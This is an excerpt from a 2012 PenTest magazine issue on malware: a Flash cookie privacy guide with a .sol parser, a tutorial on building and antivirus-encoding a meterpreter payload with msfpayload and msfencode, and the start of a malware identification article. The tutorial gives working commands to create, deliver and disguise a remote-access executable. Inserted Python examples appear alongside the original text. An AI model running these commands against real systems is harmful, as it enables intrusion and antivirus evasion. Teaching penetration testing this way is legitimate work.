Cyber Security Auditing Software


www.titania.com

Improve your Firewall Auditing

As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.

The network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail, e.g. web service query tools. However, this is only part of the picture, and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices.

Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.


Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device against that policy and then create the report detailing the issues identified. The reports can include device-specific mitigation actions and can be customized with your own company’s styling. Each report can then be saved in a variety of formats for management of the issues.

Why not see for yourself, evaluate for free at titania.com

Page 4 http://pentestmag.com 08/2012 (16) August

Editor’s Note 08/2012 (16)

Managing Editor: Malgorzata Skora [email protected]

Associate Editor: Trajce Dimkov [email protected]

2nd Associate Editor: Aby Rao [email protected]

Betatesters / Proofreaders: Ed Werzyn, Johan Snyman, Jeff Weaver, Dan Felts, William Whitney, Marcelo Zúniga Torres, Harish Chaudhary, Tom Butler, Steven Wierckx, Richard Harold, John Borkowski, Stefanus Natahusada, Gareth Watters, Wilson Tineo Moronta, Emiliano Piscitelli, Alina Klis, David Kosorok

Senior Consultant/Publisher: Paweł Marciniak

CEO: Ewa [email protected]

Art Director: Ireneusz Pogroszewski [email protected]: Ireneusz Pogroszewski

Production Director: Andrzej Kuca [email protected]

Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1, Phone: 1 917 338 3631, www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage.

All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used program

by

Mathematical formulas created by Design Science MathType™

DISCLAIMER! The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

Dear PenTesters!

Do you remember when you started with computers and you were annoyed by numerous worms and viruses? Well, I can’t compare myself to you but since I was frustrated by my computer being vandalized by malicious bugs whose origin and existence on my computer I could not explain, I simply decided that “malware” will be a great idea for my next issue.

In the section Malware we start with Cookies. Yes, I know what you will say – we know it all. Really? Ayan Kumar Pan points out that even if you are sure that you deleted all your cookies, they are often more sly than you. It is a great guide to find and control the cookies and to lull your cookie concerns. Another great tutorial deals with MsfPayload & MsfEncode. Two open source tools are practically described in order to teach and help us in encoding and thus bypassing the antivirus software on the target system. The next article by Adam Kujawa is devoted to manual identification of malware. An amazing source of useful tips, background information, necessary tools and a great tour with the Malcode Analyst Pack that will make your work a lot easier. The section ends with a piece describing not how to fight or detect malware but, on the contrary, how to use it during a penetration test and not fall into a malicious trap.

What is more? In this issue, as promised, we continue with Marc Gartenberg’s section on NISPOM. He himself admits that the topic can hardly be called appealing but you can be sure you will learn a lot and Marc will not make you feel sleepy. The Exploitation Frameworks section is still with us. This time we feature a very young learner who will guide you on how to start with this popular but often tricky topic. Our testers have loved its practicality and usefulness for beginners. I hope you will not be disappointed either.

The Review section is all about malware too. Jeff Weaver presents to you a great book entitled Practical Malware Analysis. Check whether it is worth having; Jeff is a person whose opinions you can trust. Rishi Narang will tell you all you need to know about Damballa Failsafe, antimalware protection.

Our guest in this issue is Marcin Kleczynski from Malwarebytes. He came a long way from a technician to the CEO of a great company. You should read this to learn how to do it and to hear how a proud boss can praise his team, his product and competition. What’s more, he still has time to do a pilot’s license, do polar plunges and raise money for Special Olympics.

From our regular sections, as always, Dean Bushmiller prepared for you something extra in PainPill. Do you consider yourself a salesperson? No? Dean will show you that you are and what you are selling requires devotion, patience and is based on relationship. Do you sell penetration testing services? No. Then, what DO you sell? Check! I regret I can’t see your faces when you read this.

I hope that you will find this issue worthwhile. If you have any suggestions concerning topics, problems you want to read about or people you would like to know better thanks to PenTest, please feel free to contact us at [email protected].

Thank you all for your great support and invaluable help.

Enjoy reading!

Malgorzata Skora & PenTest Team


CONTENTS

MALWARE

Flash Cookie
by Ayan Kumar Pan

If you think you have deleted all the cookies from your computer, then think again. There are certain genres of persistent cookies that do not get terminated by the commonly used ‘Clear Your Recent History’ option. One of them is a flash cookie.

MsfPayload & MsfEncode
by Pankaj Moolrajani and Hitesh Choudhary

Malicious code or software are not at all new terms in the present era. Antivirus companies are trying hard to make the Internet safe and free from malware, but still the tight bond between flaws and features comes in between.

How to Manually Identify Malware
by Adam Kujawa

During the course of Penetration Testing, you may find yourself faced with a suspicious file or series of files which are not detected by any antivirus solution, in which case being able to manually determine whether a file is malicious or not is very important.

Using Malware During a Penetration Test
by Trajce Dimkov and Henri Hambartsumyan

Malware is frequently used by cyber criminals to send spam, obtain account information, show unwanted advertisements, steal credit card numbers and obtain remote access to the internal network.

NISPOM

The Physical Aspects of Cybersecurity and Their Importance
by Marc Gartenberg

NISPOM as a whole is designed to “prescribe the requirements, restrictions, and other safeguards to prevent unauthorized disclosure of classified information.” That’s it. Plain and simple.

EXPLOITATION FRAMEWORKS

Exploitation Techniques: How You Should Start
by Fabian “@samuirai” Faessler

Have you ever dreamed about writing your own 0day exploit? I really want to do it, and I work hard to learn everything I can about it. This article is about the experiences I have had so far in learning about exploit techniques, and I want to share some of the noteworthy sources I stumbled upon in order to support other beginners.

REVIEW

Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
by Jeff Weaver

Have you ever wanted to reverse engineer malware to see exactly what it does when it infects its host? To understand how malware propagates, or even understand the malware enough to write custom signatures for your IDS/IPS to save your network?

Damballa Failsafe: More Than a Malware Protection System
by Rishi Narang

Advanced malware, persistent threats (APTs), and zero-day targeted attacks are the buzz of today’s security industry. Big and small corporates to vast infrastructures or SMEs are all victims to these stealthy targeted attacks.

INTERVIEW

Some might call me a security expert: Interview with Marcin Kleczynski, CEO of Malwarebytes
by Aby Rao

He started as a computer technician. Frustrated with criminal software he worked on a simple tool. This tool has been downloaded 200 million times and he is the CEO of a company that stops advanced malware hands down.

CONFERENCE

It Is All About the Content: SecTor Conference
by M.A. Hervieux

SecTor, the brainchild of the founders of TASK, led by an impressive advisory committee composed of leading industry experts, is preparing for its 6th annual event coming this October.

PAINPILL

Selling Services of Penetration Testing
by Dean Bushmiller

As you are doing your test, you ARE doing the sales activity. Your task is difficult because you sell the intangible – you are selling TRUST. You are saying, “Please trust us enough to attack your network.”

READ

Save the Database, Save the World – Chapter 6
by John B. Ottman

MALWARE

Flash Cookie
by Ayan Kumar Pan

If you think you have deleted all the cookies from your computer, then think again. There are certain genres of persistent cookies that do not get terminated by the commonly used ‘Clear Your Recent History’ option. One of them is a flash cookie.

This article sheds light on flash cookies, their capabilities and how they differ from HTTP cookies, pointing out some advantages related to personalization of your web experience as well as some privacy concerns associated with them. Where to find flash cookies on your computer is discussed, as well as the procedures for controlling and removing them.

What is a Flash Cookie?

A Flash Cookie, otherwise known as a Local Shared Object (LSO), Flash Shared Object or Flash Super Cookie, is a data file that can be created on your computer by the websites (using Adobe Flash) you visit. It is used by all versions of Adobe Flash Player, and version 6 and above of Macromedia’s (now obsolete) Flash MX Player. These are generally used to enhance your web-browsing experience. A website can write a cookie on your computer, and the next time you visit that website, it will load that cookie and its information in a way that provides a more customized experience.

For example, go to www.youtube.com >> click on a video to open it >> increase or decrease the volume of the Flash Player >> close the browser and delete all the cookies. Now when you reopen your browser and watch any video on www.youtube.com, you will find the exact same volume level you set during your previous session. This is done by a flash cookie. This brings us to how it differs from normal cookies, commonly referred to as HTTP Cookies.

How is it different from an HTTP Cookie?

In the previous section it was shown that even if you delete the cookies from your browser, the customisation is still there. This is because flash cookies are not stored in the same location as HTTP cookies. They are capable of storing much more information about you than HTTP cookies: an HTTP cookie, by default, can store 4 KB of data on your computer, whereas a Flash Cookie, by default, can store 100 KB of data.

An HTTP cookie is limited to a single web browser. This means that if a cookie is created by a site for tracking you when you were using Firefox, that cookie will not be able to track you if you use Chrome or any other browser. This limit is not applicable to flash cookies, because their boundary is not limited to a single web browser. No matter which browser you use, the flash cookie will continue to track you and store data on your computer.

A flash cookie comes without any expiry date. This means that unless you delete them, they will stay on your computer forever. On the other hand, the good thing about HTTP cookies is that they have an expiry date after which they are removed; and even if they do not have an expiry date, they are removed after you close the browser.

Flash cookies are stored in a binary format, so you will not be able to read and interpret their contents. On the other hand, the contents of HTTP cookies are stored as plain text, so even if you cannot understand the content, at least you are in a position to read it.

What is even creepier about flash cookies is their ability to reinstate HTTP cookies after you have deleted them. One thing to note is that this is not done by all the websites installing flash cookies on your computer. It is only done by some unethical companies with malicious intentions to track users at all costs. But when done, it is a serious violation of users' privacy. This more or less malicious practice is known as Cookie Respawning, and the HTTP cookie that has been reinstated can be called a Zombie Cookie, since it is re-spawned after being terminated. The process of cookie re-spawning is quite simple. A website installs an HTTP cookie and a flash cookie on the user’s computer. The flash cookie stores the HTTP cookie’s unique ID. When the flash cookie is activated, it checks for the existence of that HTTP cookie. If that HTTP cookie is not found on the user’s computer because the user removed it, the flash cookie creates and installs another HTTP cookie, assigning the deleted HTTP cookie’s unique ID to the newly created cookie.

Where is it stored in your computer?

In Windows, it is generally stored in:

[Root Drive]:\Documents and Settings\[User Name]\Application Data\Macromedia\Flash Player\#SharedObjects\ (Figure 1)

The important thing to note here is that the location is not limited to the aforementioned directory. Since a flash cookie is a file and every file has an extension, the flash cookie file uses the .sol extension. You can search for all the flash cookies on your computer by typing *.sol in your computer’s search bar; here the asterisk (*) wildcard returns all files with a .sol extension. You should not assume that all the files listed with a .sol extension are flash cookies, so do not be hasty in removing them. Removal is best carried out by the procedures described later in this article.

In Mac OS X, it is stored in:

~/Library/Preferences/Macromedia/Flash Player/#SharedObjects/

In UNIX/Linux, it is stored in:

~/.macromedia/Flash_Player/#SharedObjects/

Figure 1. Path for the directory where the Flash Cookies are located on the author’s computer

How to control and remove Flash Cookies?

Individual Control

Now I would like you to repeat a procedure performed in the first section of this article. Go to www.youtube.com >> click on a video to open it >> increase or decrease the volume of the Flash Player >> close the browser and delete all the cookies. Now when you reopen your browser and watch any video on www.youtube.com, you will find the exact same volume level you set during your previous session. Now, repeat the same process again. However, this time, go to the location of the site’s flash cookie on your computer. On my computer, the location is C:\Documents and Settings\Ayan\Application Data\Macromedia\Flash Player\#SharedObjects\RWGKQHRQ\s.ytimg.com. Here exists a file named soundData.sol. This file is the flash cookie for the volume adjustment. Delete this file and open any video on www.youtube.com. It can now be noticed that the volume adjustment done in the previous session does not exist anymore.

You might think that an easy way is to search for all the .sol files on your computer and delete each and every one of them. But that is not the right way to do it, since not all files with a .sol extension are necessarily flash cookies. There are many ways to safely remove flash cookies from your computer.
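The .sol files discussed above are a binary container (an LSO header followed by AMF0-encoded name/value pairs), which is why they cannot be read as plain text, and a respawning site keeps the HTTP cookie's ID inside one of them. The following is an added example, not code from the article, that walks a #SharedObjects tree, decodes every genuine LSO it finds and skips files that merely carry the .sol extension, so you can see what each site stored before deciding what to remove. The container layout and the AMF0 type markers are the documented Flash formats; the build_sol() writer, the sample site directories, the property names and the ID value are constructed for the demonstration and are not real cookies.

```python
"""Inventory and decode Flash Local Shared Objects (.sol files) under a #SharedObjects tree."""
import struct
import tempfile
from pathlib import Path


class _Reader:
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):                        # bounds-checked read, so truncated files fail cleanly
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated LSO")
        self.pos += n
        return chunk

    def unpack(self, fmt):                    # big-endian integer or double
        return struct.unpack(fmt, self.take(struct.calcsize(fmt)))[0]

    def utf(self):                            # u16 length-prefixed UTF-8 string
        return self.take(self.unpack(">H")).decode("utf-8")

    def value(self):
        """Decode one AMF0 value (the subset Flash Player commonly writes into an LSO)."""
        marker = self.take(1)[0]
        if marker == 0x00:                    # number: IEEE-754 double
            return self.unpack(">d")
        if marker == 0x01:                    # boolean: one byte
            return self.take(1) != b"\x00"
        if marker == 0x02:                    # string
            return self.utf()
        if marker in (0x05, 0x06):            # null / undefined
            return None
        if marker == 0x03:                    # object: key/value pairs until "" then 0x09
            out = {}
            while (key := self.utf()) != "":
                out[key] = self.value()
            if self.take(1) != b"\x09":
                raise ValueError("bad object terminator")
            return out
        raise ValueError(f"unsupported AMF0 marker 0x{marker:02x}")


def parse_sol(data):
    """Parse the LSO container: 00 BF, u32 body length, 'TCSO', 6 fixed bytes, name, AMF version, body."""
    r = _Reader(data)
    if r.take(2) != b"\x00\xbf" or r.unpack(">I") != len(data) - 6 or r.take(4) != b"TCSO":
        raise ValueError("not an LSO file")
    r.take(6)                                 # fixed bytes 00 04 00 00 00 00
    name = r.utf()
    if r.unpack(">I") != 0:                   # 0 = AMF0 body; 3 = AMF3, not handled here
        raise ValueError("only AMF0-encoded LSOs are handled here")
    props = {}
    while r.pos < len(data):                  # each property: name, value, one 0x00 pad byte
        key = r.utf()
        props[key] = r.value()
        if r.take(1) != b"\x00":
            raise ValueError("missing padding byte after property")
    return name, props


def build_sol(name, props):
    """Tiny AMF0 LSO writer (numbers, booleans, strings) used only to fabricate sample files."""
    def utf(s):
        b = s.encode("utf-8")
        return struct.pack(">H", len(b)) + b

    def amf(v):
        if isinstance(v, bool):
            return b"\x01" + bytes([v])
        if isinstance(v, (int, float)):
            return b"\x00" + struct.pack(">d", v)
        return b"\x02" + utf(str(v))

    body = b"TCSO\x00\x04\x00\x00\x00\x00" + utf(name) + b"\x00\x00\x00\x00"
    body += b"".join(utf(k) + amf(v) + b"\x00" for k, v in props.items())
    return b"\x00\xbf" + struct.pack(">I", len(body)) + body


def inventory(root):
    """Map site directory -> {file: properties}; non-LSO *.sol files are skipped, not deleted."""
    found = {}
    for path in Path(root).rglob("*.sol"):
        try:
            _, props = parse_sol(path.read_bytes())
        except ValueError:
            continue
        found.setdefault(path.parent.name, {})[path.name] = props
    return found


def demo():
    """Constructed data: a YouTube-style soundData.sol, an LSO holding a respawn ID, and a stray .sol."""
    with tempfile.TemporaryDirectory() as tmp:
        yt, tracker = Path(tmp, "RWGKQHRQ", "s.ytimg.com"), Path(tmp, "RWGKQHRQ", "tracker.example")
        yt.mkdir(parents=True)
        tracker.mkdir()
        (yt / "soundData.sol").write_bytes(build_sol("soundData", {"volume": 57.0, "muted": False}))
        (yt / "notes.sol").write_bytes(b"not a flash cookie at all")
        (tracker / "uid.sol").write_bytes(build_sol("uid", {"http_cookie_id": "CONSTRUCTED-ID-1234"}))
        return inventory(tmp)
```

Point inventory() at one of the #SharedObjects directories listed above and it keys each result on the directory directly above the file, which in the YouTube example is s.ytimg.com. A property that looks like a cookie identifier rather than a preference such as a volume level is the tell-tale of the respawning practice described earlier.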

You can do it individually for a site by visiting that site and adjusting the storage settings. The default is 100 KB. You can set the other available sizes, which are 10 KB, 1 MB, 10 MB and also unlimited. To do this for YouTube videos, go to a YouTube video and right-click on the flash player; a menu will appear. Click on Settings in that menu; now you can set the size limit using the slider as you wish (Figure 2). Remember, if you select a size less than 10 KB (0 KB), you are in fact restricting YouTube from storing any flash cookie on your computer, and also deleting the previously stored flash cookies from YouTube.

Global Control

The previous example can be tedious if you use a lot of sites that use flash cookies. Moreover, there are some websites which plant flash cookies by playing a small flash video, and when this happens you may not know about it. To view all the sites storing flash cookies on your computer and control them once and for all, go to Adobe’s website and use the slider to control the Website Storage Settings and the Global Storage Settings [4]. You can use the Website Storage Settings Panel to view all the websites which have stored flash cookies on your computer, remove some selected or all of the flash cookies, prevent them from being stored on your computer, and adjust the size of flash cookies. If you select a size less than 10 KB (0 KB), you are in fact restricting the website from storing any flash cookie on your computer, and also deleting the previously stored flash cookies from that website (Figure 3).

Figure 2. Controlling flash cookies in YouTube

Figure 3. Website Storage Settings Panel

You can use the Global Storage Settings Panel to specify the amount of disk space that websites you have not yet visited can use to store information on your computer. No flash cookies will be stored on your computer if you uncheck the option “Allow third-party Flash content to store data on your computer” (Figure 4). But remember that unchecking this option will remove all customisation done by you on a website, and you will need to redo your preferred settings all over again.

Browser Control

It can be categorised as proactive control and reactive control.

Proactive browser control refers to the web browser's ability to prevent the storing of flash cookies when private browsing mode is enabled. Flash Player supports the privacy modes of Internet Explorer, Mozilla Firefox, Google Chrome (Incognito) and Apple Safari. The flash cookies that were created in private browsing mode are discarded at the end of the session. Those created in a regular session are also not accessible in this mode. One hiccup in this proactive control is that it does not prevent some malicious-intent websites from trying to re-spawn cookies. One more method for proactive control is to disable the Shockwave Flash plugin (Figure 5). This would rather be a drastic step for taking control. This might be fine for some, but definitely not for those who like to watch flash-based online videos and play flash-based online games. So, it would be better to use Adobe’s settings panel (as discussed in the previous sub-section) and/or private browsing mode instead of disabling the Shockwave Flash plugin.

Reactive browser control refers to the use of third-party software, better known as Add-ons/Extensions, for your browser. The add-ons for Mozilla Firefox are BetterPrivacy, Privacy+ and Click&Clean. Click&Clean is also available for Google Chrome.

Figure 5. Toggling the Shockwave Flash plugin

Figure 7. Clear recent history

Figure 6. Custom settings for history

Figure 4. Global Storage Settings Panel


BetterPrivacy allows listing and managing flash cookies [5]. In this, you can delete flash cookies upon Firefox exit, on application start and also set a timer for deletion of flash cookies. Moreover, a checkbox is added in the Firefox Options. Firefox >> Options >> Privacy >> Use custom settings for history (via drop-down menu) >> check ‘Clear history when Firefox closes’ >> click on the activated ‘settings’ button >> check ‘flash cookies’ and click OK (Figure 6). Similarly, another checkbox for deleting flash cookies is added in ‘Clear Recent History’ (Figure 7). However, if you do not want all the flash cookies to be automatically removed, then you can disable the automatic deletion function and manage individual cookies from the presented list (Figure 8).

Privacy+ adds a checkbox in the Firefox Options [6]. You can access it via: Firefox >> Options >> Privacy >> Use custom settings for history (via drop-down menu) >> check ‘Clear history when Firefox closes’ >> click on the activated ‘settings’ button >> check ‘flash cookies’ and click OK (Figure 9). This is similar to the feature added by BetterPrivacy discussed above. BetterPrivacy has the edge over this add-on since, besides this option, it can also help the user manage individual cookies.

Click&Clean performs functions similar to Privacy+, and is developed by hotcleaner.com [7]. It adds a button to the browser’s interface from where you can perform the desired actions. Click the button, a drop-down menu will appear >> Options >> Clear private data when browser closes >> uncheck ‘disable’ >> Advance >> check ‘Flash Local Shared Objects (LSO)’ (Figure 10). In addition to removing flash cookies, this extension has a host of other utilities for your computer such as disk clean-up, malware scan and many more. So, it is a multi-purpose extension.

Figure 8. Managing flash cookies

Figure 9. Clearing flash cookies via Privacy+


Desktop Control

This implies that flash cookies can also be controlled by application software. One such software is CCleaner [8]. It is multi-purpose software with a lot of other useful utilities. For cleaning flash cookies, open CCleaner >> select the ‘Cleaner’ tab >> select the ‘Applications’ tab >> go to ‘Multimedia’ and check ‘Adobe Flash Player’ >> Run Cleaner. Here, you can also view the files by clicking the ‘Analyze’ button (Figure 11).

Still having privacy concerns?

Most web users are concerned about their privacy due to persistent news about companies tracking their activities. Now there is good news for them. There are certain tools and features which can let them know which websites are tracking them and then block some or all of those sites as they wish.

To begin with, there is an add-on for Firefox, called Ghostery, which lets you know about the sites tracking you online [9]. It will display a list of trackers when you open a site. From that list, you can learn about each item and also block it if you want (Figure 12).

The new versions of some web browsers include a Do Not Track feature. This allows you to let a website know you would like to opt out of third-party tracking for purposes including behavioural advertising. It does this by transmitting a Do Not Track HTTP header every time your data is requested from the Web. To activate this in Firefox, go to Firefox >> Options >> Privacy >> check ‘Tell websites I do not want to be tracked’ (Figure 13).

Like the previous feature, there is an add-on called Do Not Track Plus that blocks tracking technologies which advertisers and other companies use to track your browsing behaviour. Moreover, it automatically blocks websites from following you and has easy-to-customize settings. It is available for all the popular web browsers.

Figure 10. Clearing flash cookies via Click&Clean

Figure 11. Clearing flash cookies via CCleaner


Conclusion

Opinions are generally divided as far as the use of flash cookies is concerned. This is because some use them in a good way to give you a personalized web experience, while some use them maliciously to track or gain private information about you. But with the various tools and techniques explained in this article for managing flash cookies, along with the Do Not Track feature, you should surf the amazing web without any worries.

Figure 12. Ghostery

Figure 13. Enabling the Do Not Track feature in Firefox

References and further reading

[1] www.adobe.com
[2] www.websiteadministrator.com.au
[3] www.practicalecommerce.com
[4] www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager07.html
[5] addons.mozilla.org/en-US/firefox/addon/betterprivacy
[6] addons.mozilla.org/en-US/firefox/addon/privacy
[7] www.hotcleaner.com/clickclean_chrome.html
[8] www.piriform.com/ccleaner/download
[9] www.ghostery.com/download

AYAN KUMAR PAN

Ayan Kumar Pan holds an M.Tech degree in Information Security and Computer Forensics from SRM University, Chennai, India; and a B.Tech degree in Information Technology from National Institute of Technology, Patna, India. He has worked as an Intern in National Informatics Centre, Port Blair, India. He has secured A+ grade four times in various National Level Mathematics Aptitude Tests. Twitter: @ayankumarpan


MsfPayload & MsfEncode

Malicious code or software are not at all new terms in the present era. Antivirus companies are trying hard to make the Internet safe and free from malware, but still the tight bond between flaws and features comes in between. The pre-installed utilities in a BackTrack machine (i.e., msfpayload and msfencode) can make you insecure about the safety of the Internet by simply showing you a simple PDF file with malicious intent.

Msfpayload can generate a payload in .exe, Ruby, Perl or .dll format, which can run on 32-bit as well as 64-bit platforms. In addition, by combining this payload-generating utility with msfencode a person can easily encode the payload many times over to bypass antivirus measures.

Target Audience

This article is a simple demonstration of combining both of these utilities so that anyone using BackTrack can follow the step-by-step use of these two utilities. An unsuspecting audience can get caught by a malicious file, since it is so easy to create and deliver it to the victim.

Scope

Trojans and payloads cause about $13 billion of damage annually (http://www.computereconomics.com/article.cfm?id=1225). Every year many of these payloads are activated in March, due to the heavy flow of currency during that month. As we talk about the scope of the victims, we can say that most Windows-based users can be compromised. But with the help of these two utilities one can easily transform the same attack to Linux machines as well.

How can we forget the power of open source? Msf-Payloads and Msf-Encoders are open source tools and are easy to use. There are 800+ payloads and 245+ encoders available within these two applications.

Hardware/Software Requirements

No specific hardware requirements are necessary for this exploit. The software requirement is a BackTrack Revision-2 machine as the attacker. We will be using Windows XP SP2 (fully patched and updated) as the victim machine. Note: Windows 7 could also have been used for this demonstration.

Figure 1. # cd /pentest/exploits/framework2

Explanation of scenario

For the new user of a BackTrack machine, I would consider this a highly advanced RAT (like ProRat) that is capable of doing many things beyond your imagination. Likewise, we have to transfer a malicious file to the victim, and a RAT (Remote Administration Tool) is capable enough to get a reverse connection. With the help of the msfpayload utility, one can get a reverse connection from the payload that was generated.

In this scenario, we are trying to upload a malicious file to a local server of BackTrack, then demonstrate how one can get a reverse connection from the payload. Apart from this we will also use the msfencode utility, which already has a variety of encoders, like shikata, to help us in encoding and thus bypassing the antivirus software on the target system.

Attack Scenario and Implementation

We are using a BackTrack machine to run the msfpayload utility and a Windows XP SP2 (fully patched) machine as the victim. Using the commands below, one can use this pre-installed utility that is shipped with Metasploit in BackTrack:

# cd /pentest/exploits/framework2 (Figure 1)
# msfpayload -h (Figure 2)

This command will help any new user to better understand the utility, as it gives its functionality and its usage in more detail. One can simply choose any payload from the variety available and, just by using the “S” option, a summary screen can be seen with the details of the specific payload.

Figure 2. msfpayload -h

Figure 3. # msfpayload windows/meterpreter/bind_tcp


Figure 4. # msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.00 X > hitesh.exe

Figure 5. A Web Server Download

Figure 6. A Multi Handler Exploit


HITESH CHOUDHARY

Hitesh Choudhary is an India based ethical hacker working for the welfare of society. He is also founder of a free video portal to learn a variety of technology over the internet at http://www.itube.igneustech.com. He has also provided his lectures to a variety of industries, as well as institutions. You can visit his home page at www.hiteshchoudhary.com

PANKAJ MOOLRAJANI

Pankaj Moolrajani is an India based security researcher at Igneus technologies. He is RHCE & RHCSS Certified.

In this case we have chosen meterpreter, as it is the most powerful payload that I have seen so far.

# msfpayload windows/meterpreter/bind _ tcp (Figure 3)

If you noticed in Figure 3 the connection with the victim will happen over the port 4444, but the val-ue of rhost is not specified. So all we have to do is fill this value. In our case, the Remote IP is 192.168.80.129, which I have used for demo pur-pose. Now we will create an executable for Win-dows called hitesh.exe

# msfpayload windows/meterpreter/bind _tcp RHOST=192.xxx.xxx.00 X > hitesh.exe (Figure 4)

Let us say that attacker was successful in trans-ferring the file to victim. In our case I have trans-ferred it via a web server download (Figure 5).

Coming back to the BackTrack machine, we now have to set a multi handler exploit.

#msfconsole#use exploit/multi/handler#set PAYLOAD windows/meterpreter/bind_tcp#set RHOST 192.168.xxx.xxx#exploit

Having a meterpreter session means a lot to any researcher, since they can easily download, up-load, sniff keylogs, piviot the machine, or use a variety of other tasks.

This is just a basic demo of interacting with msf-payload. Another interesting encoding mechanism is msfencode and is very simple to use as well.

#Msfencode –h

One thing worth mentioning here is that the out-put of msfpayload should be in a raw format to be

encoded by this utility. We are using the shikata ga nai encoder, which is a Polymorphic xOR ad-ditive feedback encoder.

#msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.xxx R | msfencode –e x86/shikata_ga_nai -c 3 -o encode.exe

I have tested this encode.exe with a variety of an-tivirus engines and in just 3 iterations 10 antivi-rus engines out of 38 were not able to detect it. I would even go so far as to say that there’s no harm in running more iterations till the file is unde-tected by more of the antivirus engines. Encoding your payload is easy to do and foils the antivirus engines with ease using these simple tools – msf-payload and msfencode, so add them to your tool belt and be a better pentester.

Figure 7. #msfpayload windows/meterpreter/bind_tcp RHOST=192.xxx.xxx.xxx R | msfencode –e x86/shikata_ga_nai -c 3 -o encode.exe

MAlWARE

Page18 http://pentestmag.com08/2012 (16) August
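To make concrete what the shikata_ga_nai pass of msfencode does to the payload bytes, here is an added Python model of an XOR additive-feedback encoder. It is not Metasploit's code: it emits no x86 decoder stub, and the key handling and feedback order are a simplification of the real encoder. What it shows is that the body bytes change completely with every key and every iteration, while the decoding procedure itself stays fixed; in the real tool that fixed decoder stub is prepended to the output, and it is the stub, not the encoded body, that antivirus signatures latch onto no matter how many iterations you run. The sample bytes in the demo are constructed stand-ins, not a payload.

```python
# Added illustration (not Metasploit's code): a minimal model of the XOR
# additive-feedback scheme that x86/shikata_ga_nai applies to a payload.
# The real encoder also emits an x86 decoder stub in front of the buffer;
# this model has no stub and is for understanding the byte transformation only.
import os
import struct

MASK = 0xFFFFFFFF


def _pad(buf: bytes) -> bytes:
    """Pad with NUL bytes so the buffer splits into whole 32-bit words."""
    return buf + b"\x00" * (-len(buf) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR every dword with a running key; after each word the plaintext word
    is added back into the key, so the output of word n depends on every word
    before it (the feedback that makes the output look unlike the input)."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", _pad(payload)):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """Inverse of encode(): recover the word, then apply the same feedback.
    blob must be a multiple of 4 bytes, as encode() always produces."""
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", blob):
        word = enc ^ key
        out += struct.pack("<I", word)
        key = (key + word) & MASK
    return bytes(out)


def encode_iterations(payload: bytes, keys) -> bytes:
    """msfencode -c N re-encodes the previous output N times, each pass with
    a fresh key (and, in the real tool, a fresh decoder stub in front)."""
    blob = payload
    for key in keys:
        blob = encode(blob, key)
    return blob


def decode_iterations(blob: bytes, keys) -> bytes:
    """Undo the passes in reverse order; the padding of the first pass stays."""
    for key in reversed(list(keys)):
        blob = decode(blob, key)
    return blob


def random_key() -> int:
    """The real encoder picks a random key per run, which is why every
    msfencode run produces a different file from the same payload."""
    return struct.unpack("<I", os.urandom(4))[0]


def bytes_in_common(a: bytes, b: bytes) -> int:
    """Count positions where two buffers share a byte (a crude similarity)."""
    return sum(x == y for x, y in zip(a, b))


if __name__ == "__main__":
    sample = b"\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\xb8\x90\x90"  # constructed stand-in bytes
    keys = [random_key() for _ in range(3)]
    blob = encode_iterations(sample, keys)
    print("encoded:", blob.hex(), "bytes in common with input:", bytes_in_common(sample, blob))
    print("round trip ok:", decode_iterations(blob, keys) == sample)
```

Each run prints a different encoded buffer because the keys are random; pass your own key list to encode_iterations() for a reproducible result.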

How to Manually Identify Malware
During the course of penetration testing you may find yourself faced with a suspicious file or series of files which are not detected by any antivirus solution, in which case being able to manually determine whether a file is malicious or not is very important.

This article is meant to teach anyone how to determine whether a suspicious file is malicious or not; it covers topics from obtaining static file data to using online scanners and executing files in a secure analysis environment.

Real-World Situation
One of the requirements of performing a thorough and detailed penetration test is knowing that the target network is not already compromised by malicious actors or malware, for which monitoring network traffic logs and open ports and running malware scans on individual systems is essential to confirming a clean base to start from.

This article directly approaches methods to use in the following situation:

